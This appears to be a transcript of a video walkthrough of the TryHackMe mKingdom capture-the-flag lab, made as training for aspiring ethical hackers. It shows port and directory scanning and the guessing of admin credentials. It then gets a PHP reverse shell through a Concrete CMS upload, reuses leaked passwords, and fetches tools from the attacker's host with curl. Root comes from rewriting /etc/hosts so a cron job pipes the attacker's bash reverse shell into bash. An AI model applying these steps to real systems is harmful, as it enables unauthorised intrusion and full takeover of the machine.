How do you think the best hackers learn their craft? Well, it's not so secret they learn in one day. It takes years of studying, but the best place to start out is by doing CTFs or capture the flags on sites like TryHackMe and hackthebox. In this video, I'm going to show you the foundational skills to help you become an ethical hacker and complete your first CTF. Let's get started and boot up our Kali Linux virtual machine. If you don't know what that is, click this video to learn how to install it. I will use TryHackMe's mKingdom CTF as my example throughout the video, but we first need to connect to TryHackMe's virtual private network to access the target machine. Head to our profile, click Access, set your region, generate and download the VPN configuration file. Now in our terminal, type sudo for root privileges, openvpn, and the path to our ovpn file. Enter your password, and once you see initialization sequence complete, this means that you are connected to the TryHackMe VPN. We can verify this with ifconfig. We'll type ifconfig, and this will show us all our active interfaces. Ton 0 has shown up with our IP address on the VPN. Now join the mKingdom room and spawn our target machine. Now we are ready to start hacking.
Phase 1. Enumeration.
Let's copy the target IP address and begin with an nmap scan. Nmap is a tool that can scan the target for any open ports. Open ports host services that we can potentially exploit. We will type nmap and paste in our target IP address with Ctrl+Shift+V. Now this will scan the top 1000 most common ports, but we want to add more. We can add the -p flag to scan specific ports like 80 or 443 and so on. But using -p- will scan all 65,535 total ports, just in case a service is running on an obscure port. We will also add -sv to enumerate the version number of any found services. If something is out of date and using an old version, it's probably vulnerable. We will also add -sc to run common scripts against the open ports to see if we can get any quick wins, such as anonymous FTP access. For brevity, we can combine this into -svc. If your scan is taking forever, consider adding -t4, but this may skip over some things. And finally, we will add -on to write the output to a file, so that we don't have to run the whole scan again, and we can just refer to the file. We will call this file nmap. You can press enter to run this, and pressing enter again at any time will show us the progress of its completion. As always, commands are in the description, but you can learn how to use any tool by adding -h or --help to it. If we list the files in our directory, we see we have an nmap file, and we can cat nmap to see the contents of it. And we only have one port open, port 85. This port is running an HTTP web server, which is a bit weird considering the default for HTTP is on port 80, not 85. Let's take a look at the website. In our browser, let's open a new tab, type http:// paste in our IP, colon for specifying a port, and this is on 85. If it was on port 80, we wouldn't need to specify a port because it's the default. The front page and the source code don't really show anything of interest, but there may be more to this web server than meets the eye. We can brute force directories with GoBuster. Let's type GoBuster dir to specify directory brute forcing, -w to specify a word list. We'll use /user/share word lists. We'll use dirbuster, and we'll use directory 2.3 medium. And we also need to specify the URL with -u, http or IP, port 85, and -x to add any extensions such as txt or pdf. I'll just do txt for now. And -o to output this to a file. We'll call this GoBuster. The output shows an app directory. So let's enumerate the website, but while we're doing that, let's run another GoBuster scan and change this to enumerate directories within the app directory. Let's browse to it and see what's up. Okay, we have a button that says jump. Anything special in the source code? Nope. Alright, this seems to be Toad's blog with a bunch of pictures of mushrooms. Alright, so we have this blog page, which seems to just be some lorem ipsum text. We also have a contact page. Okay, docs. Yeah, GG. And we have a contact page which we may be able to exploit, maybe send some phishing emails to. And we also see this login button right here. And we have a login page. Let's see if we can exploit that. Let's open Wapalizer, a free extension to view the technology stack of the website. We see that it is using Concrete CMS 8.5.2. CMS stands for Content Management System, and it's used to create a website without having to code every single part of it. For example, WordPress. If the CMS is on an out-of-date version, there may be an exploit for it.
Phase 2. Initial foothold.
The website also shows in the bottom, built with Concrete 5 CMS. Let's look up Concrete CMS 8.5.2 exploit. Okay, let's click this first one. We see we have a remote code execution reverse shell exploit. Let's read. Okay, so it seems we're able to upload a PHP reverse shell if we have admin access to the CMS. Now let's see if there's any default credentials for Concrete CMS. Okay, so the default username seems to be admin, but there doesn't seem to be any default passwords. Let's try and see if they're using a common one. We use username admin, and for our password, we'll just try admin. Admin. Doesn't work. Admin root. Doesn't work. Maybe admin password. And there we go. We have logged into the CMS as admin. So now let's use this exploit we found to get remote access. We first need to visit allowed file types and enable PHP, and then upload a PHP rev shell. We'll head to System and Settings, allowed file types, and add in PHP here. Click Save. Now let's head to Files, and let's try and upload a PHP rev shell. Now we could upload the PHP web shell I showed in the SQL injection video, but we're going to use a more sophisticated attack. Head to revshells.com, enter your IP address. You can see it in the top right hand corner of your screen. If not, you can always type ifconfig into the ton0 address, 67.242, and we'll enter any port we want. I'm going to use 443 because it's the default for HTTPS, which typically doesn't have any firewall restrictions. Revshells.com, made by Ryan Montgomery, also known as Zero Day, creates easy-to-use rev shells for Mac, Linux, and Windows. We'll scroll down and use the PHP rev shell made by Pentest Monkey, and you can see here our IP and port are already implemented. So we can just copy this, head to our terminal. We see the castle directory here. We could reverse that further, but I think we already have a good attack vector. We will nano rev.php, and we can just paste that in there. Control X to exit. Y save, enter that name, and now let's try and upload that file. Upload files. Pebble, TryHackMe, mKingdom, ref.php. All right, closing out of that, we can now see that our upload has been complete, and we have this rev.php shell open. So let's go to that. And it says connection refused because we need to set up a listener. We'll go to our terminal, type nc for netcat -lvnp 443 to listen on port 443 for a reverse shell connection. And refresh the page, and now we can see that it's buffering. And if we go here, you can see that we have a connection from the target machine. Now to make our lives easier, we're going to upgrade to a full TTY. Again, the commands are in the description. We can head to Hacktricks full TTYs and copy this Python command, paste that in there, and now we can see we have this user at mKingdom. And if this didn't work, it's probably because it doesn't have Python 3 installed. You can type which Python, and you could just use basic Python without the 3 if it didn't work. Now we're going to copy this, press Ctrl+Z, and then enter these commands. Ctrl+Z to background it, paste that in there, enter, and now, like if we press Ctrl+C, it doesn't cancel our connection, but will cancel whatever service we're running inside the rev shell. By typing who am I, we see we are www data, also known as the web server user.
Phase 3. Lateral movement.
Because of the login screen, we know that there is some type of database. In order for a web server to access a database, typically the database credentials are stored in a configuration file. The web root is stored in /var/www/html, and we'll head to app, head to castle, head to application, and we see config. Let's head to config, and we see database.php. So at database.php. So we see that this is the case. MySQL credentials are supplied here in plain text. Username Toad, password Toad is the best. Very humble. If we cat /etc/passwd, it'll show all of the users on the system. We see Mario and we see Toad. Maybe Toad reused the database password for his account. Let's copy the password, Toad is the best, and we'll su to switch users to Toad. Control-Shift-B, paste in the password, and we are now Toad. Who am I? Whoops, who am I? We are Toad. The .bashrc bash script is executed when a new shell instance is started. From inside this script, environment variables can be specified to be automatically set when a new user's shell is spawned. Sometimes system administrators store credentials inside environment variables as a way to interact with custom scripts that need authentication. By going to Toad's home directory, we can see with -LAH, -A shows dot files or hidden files, the bashrc file here. And if we cat.bashrc, we can see that this environment variable is set. pwd token equals this. We can also see environment variables with env. Now this shows all the environment variables that are set. And we see this very interesting one, pwd token, and it looks to be some base64 encoded string. If you can't tell encoding types yet, that's okay. We're gonna search for magic inside of CyberChef and drag that into our recipe, paste in our string, and you can see from base64, it decodes to whatever this is. It's an interesting result. Maybe it's a password? We can try authenticating as Mario with this. Which, lowercase, there we go. Paste that in. Authentication failure. Did I not copy it? I may have not copied it. Mario. There we go. We are now Mario. Let's go to Mario's home directory, and we can see this user.txt. Permission denied. User flag seems to have root privileges, but we should still be able to read it. So let's copy user.txt and to /temp. So let's go to /temp ls. Now we can cat user.txt, and there we go. Let's paste that into our first flag there.
Page 4. Privilege Escalation.
Let's look at a tool called pspy. Pspy is a command line tool designed to snoop on processes without the need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. We can download the latest version from the GitHub repo, link in the description, going to latest releases and clicking on pspy 64 or 32 depending on what type of architecture the target is on. You can just type arc and we can see x86 64, so we will download the 64-bit version. I will copy from my downloads folder pspy 64, and then the dot is just the current directory. We need to transfer this file to the target machine, and we're going to do that by setting up a web server ourselves. We'll do python -m http.server, whatever port. We're going to go with 80, which is the default. And even if we just browse to our IP, 10.6.67.242, we can see that our pspy file is hosted right here. Now on our rev shell, let's download the pspy file. There are plenty of tools such as wget or curl to download the file, but I like to use curl. We will type curl and then our web server http://rip 10.6.67.242 /pspy 64 And then we can do -O to output it to a file called, we'll just call it pspy. And ls, there we go, we have this pspy file. But if we do ls-lah, we can see that it's not executable. So we need to mark it as executable with chmod + x pspy. Now if we do ls-lah again, we can see that this pspy file is marked as executable, so we can do /pspy. Running pspy shows an interesting cron job run by root. It seems to grab the contents of a remote bash file from its own web server and pipe it into bash to execute it, and then save the contents to up.log. If we can modify this script in any way, it'll still be ran through bash, and we may be able to execute arbitrary commands as root. Let's see what the script does first. I'll just copy this. Let's head to /var/html or /www/html, and then I'll cat this. Am I not in the right? Oh, cat dot, because the current working directory as well. There we go. So it's gonna echo this. So this seems to count the number of folders and files in the web root. So it says there are X number of folders and files in the Castle app in, and then I guess it records the date as well. So let's see if we can modify this. ls-lah. Only root can write over it, so we can't modify the file. But remember, the cron job specified this domain and not the IP. If we can modify the DNS, we may be able to pull the file from a different web server, such as our own. This is known as DNS poisoning. Let's check the permissions of the DNS file. We'll do ls-lah/etc/hosts. We can see that Mario has write permissions over etsy hosts. So I'm gonna echo RIP 10.6.67.242, and then we'll do mKingdom.TryHackMe, and then we'll overwrite the etsy host file. So now when it looks for that file, it should pull from our server. So if we remember, it pulled from port 85. So let's set up a Python server on port 85 and see if it is trying to pull that file from our computer instead. There we go. So we just tried to get this bash script from our server instead, and it threw a 404 error because the file doesn't actually exist. So let's make it, and let's make it a reverse shell. So let's make dir app, go into app, make dir castle. Let's make another directory, application, go into application, and here we'll touch counter.sh. If we nano counter.sh, we'll just enter a bash reverse shell. Again, we can get that from brevshells.com. 443 is still fine. So let's just do the first one, this bash reverse shell, paste that into here, Control X exit, Y save, enter same name. And now let's host this web server, and we'll just increase this for you guys, and then we'll just nc-lvnp 443 to listen on port 443, and we'll wait for the cron job to run again. Oh, hold on. Before I do that, you need to go back. There we go. Because it's going to try and pull a directory from the directory. We're hosting it from inside this directory. We shouldn't do that. We need to have it from the parent directory so that there is an app directory inside of it. And there we go, 200 OK. It got app castle application counter.sh. Like I can just tree current directory. You can see app castle application counter.sh. And there we go. We got a reverse shell. Who am I? Love that hashtag. We are root cat/root/root.txt. Permission denied. What? cd root cat root.txt sudo cat root.txt. Permission denied. What? We are literally root. Why can't we cat root.txt? Okay, for some reason that's not working. Let's try and copy root.txt to /temp. All right, let's cat root.txt. Okay, that worked again. For some reason, cat was not having fun. And we finished that just in time. There we go. Completed the room. If you have made it this far in the video, I would like to thank you and wish you good luck on your journey in becoming an ethical hacker. And I will see you guys in the next one. Peace.